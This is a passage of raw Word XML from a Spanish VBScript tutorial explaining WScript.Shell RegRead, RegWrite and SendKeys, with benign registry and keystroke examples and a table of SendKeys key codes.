          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>valor que lea en el registro la función</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Si el valor que lee la función en el registro es un valor de la cadena, la variable recibirá una cadena, si es un valor dword la variable recibirá un número y si es un valor binario normalmente dará error. En este ejemplo, la variable recibirá la versión actual de Internet Explore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ws</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.RegRead</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HKEY_LOCAL_MACHINE\Software\Microsoft\Internet </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xplorer\Version")</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terc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egWrite</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función crea una clave nueva, agrega un valor a una clave ya existente o cambia un valor ya existente. La función tiene tres partes: La primera donde se indica la ruta donde queremos crear el valor y el valor que queremos crear. La segunda es el valor que le asignamos al valor creado. La tercera es el tipo de valor. Los tipos de valores son REG_SZ si queremos crear un valor de la cadena y REG_DWORD si queremos crear un valor dword. Si queremos crear una clave nueva es tan sencillo como </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>indicarlo como si existieran desde el principio</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la primera parte. Por ejemplo, en el siguiente ejemplo creamos el valor Web1, que es una cadena que contiene el valor www.google.es, dentro de la clave HKEY_LOCAL_MACHINE\ Software\Microsoft\Internet Explorer\Lista deWebs\. Y realmente lo que estamos haciendo aquí es ir a Internet Explorer, crear una clave llamada Lista de Webs y crear dentro el valor Web1. Es sencillo si entiendes el funcionamiento del Registro de Wi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1395"/>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1395"/>
        <w:jc w:val="left"/>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ws</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.RegWrite</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HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Lista deWebs\Web1","www.google.es","REG_SZ"</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Atención</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Modificar datos en el registro de Windows puede ocasionar el mal funcionamiento de su SO o de alguno de sus programas. Si no esta seguro de lo que hace no lo intente y si lo intenta cree por lo menos una copia de seguridad del registro antes de realizar cambios en el para poder restaurarlo si algo ocurre mal. Recomendamos también que antes de modificar el registro con VBScript, lo haga manualmente hasta que sepa exactamente que es cada cosa, como se expresan las direcciones, las calves que no se deben tocar, que función realiza cada tipo de valor...</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 continuación, las siguientes funciones que se van a enseñar sirven para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>controlar aplicaciones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Supongo que habréis visto alguna vez a algún amigo o familiar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>usar algún programa solo con el teclado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Lo primero que deberéis hacer es saber hacer eso, es decir saber </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>controlar cualquier aplicación con el teclado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. No es difícil, por ejemplo, normalmente en los Procesadores de Texto se cambia entre la zona de escritura y el menú con el botón Alt. Es cuestión de probar y conocer los de aquella aplicación que quieras controlar. Una cosa a </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tener en cuenta es el tipo de aplicación a controlar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, por ejemplo, controlar la línea de comandos es una tontería, porque es mas sencillo crear un archivo bat y ejecutarlo; por otro lado, el paint no lo podemos controlar porque requiere el uso del ratón.</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ened en cuenta el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tipo de control</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que vamos a realizar sobre la aplicación. Hay muchas formas de controlarlas, pero esta </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es generalizada</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> además, por decirlo de alguna manera espectacular. Con esto quiero decir que lo que haremos será ejecutar la aplicación, comprobar que tenga el foco y que no la cierren, y ir enviándole pulsaciones. Esto tiene el efecto claro a ojos de una persona normal de que alguien te esta controlando desde Internet al estilo de las películas.</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primer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lugar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> debemos aprender la siguiente función: la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SendKeys</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función utiliza el objeto WScript.Shell. Esta función envía una serie de pulsaciones al área de texto activa que haya en ese momento. Es muy útil para ayudar la programación en otros lenguajes. También puede tener otras utilidades, que variaran según tu imaginación. Abajo hay un ejemplo de uso de esta función:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8654" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8654"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865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En 10 segundos escribirá automáticamente el código de registro. Clique sobre la zona de escritura...",0,"Registro")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="512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WScript.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Sleep </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>10000 ws.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>SendKeys</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "an123rgb2"</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Esto enviará al área de escritura la cadena an123rgb2, recomiendo probarlo antes de continuar y ver a que me refiero. Recuerda aquí las funciones </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sleep</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Quit</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> enseñadas anteriormente. El método </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">SendKeys </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">utiliza algunos caracteres especiales como modificadores de los caracteres normales (en lugar de utilizar su valor impreso). Este conjunto de caracteres especiales incluye los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>paréntesis, llaves, corchetes, el signo más "+", el acento circunflejo "^", el signo de porcentaje "%", y la tilde llana "~"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para enviar estos caracteres al área de escritura, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>inclúyalos entre llaves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por separado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, según el ejemplo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37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 ws.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SendKeys</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> "3{+}2=5 {(}Suma basic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ambién decir que algunas pulsaciones de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>teclas no generan caracteres</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (como Enter y Tab). Otras pulsaciones representan acciones (como Retroceso y Ctrl.).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tenemos un ejemplo y la tabla de pulsaciones de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>teclas no generan caracteres</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (como Enter y Tab) y/o representan acciones (como Retroceso e Ctrl). En el siguiente ejemplo escribimos en el área de texto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="FF8040"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para abrir la ayuda pulse F1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y luego la abrimos automáticamente enviando la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pulsación del F1</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332" w:line="238" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="3364" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:color w:val="408080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="408080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="408080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="408080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="408080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="408080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">") </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:color w:val="008080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SendKeys</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="008080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="FF8040"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para abrir la ayuda pulse F1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>{F1}</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"</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está la tabla con la lista de pulsaciones especiales de la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:color w:val="008080"/>
          <w:u w:val="single" w:color="008080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función SendKeys</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:color w:val="008080"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6630" w:type="dxa"/>
        <w:tblInd w:w="1024" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="34" w:type="dxa"/>
          <w:right w:w="54" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="94"/>
        <w:gridCol w:w="2489"/>
        <w:gridCol w:w="3953"/>
        <w:gridCol w:w="94"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="78"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="80808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3981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="80808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76" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="80808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02"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="80808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5" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tecla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3981"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19" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Hay que escribir...</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RETROCESO</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3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BACKSPACE}, {BS} o {BKSP}</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INTERRUMPIR</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BREAK}</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BLOQ MAYÚS</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CAPSLOCK}</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21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UPR o SUPRIMIR</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DELETE} o {DEL}</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LECHA ABAJO</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DOWN}</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IN</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END}</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ENTRAR</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ENTER} o ~</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ESC</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ESC}</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AYUDA</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HELP}</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INICIO</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HOME}</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single" w:sz="2" w:space="0" w:color="808080"/>
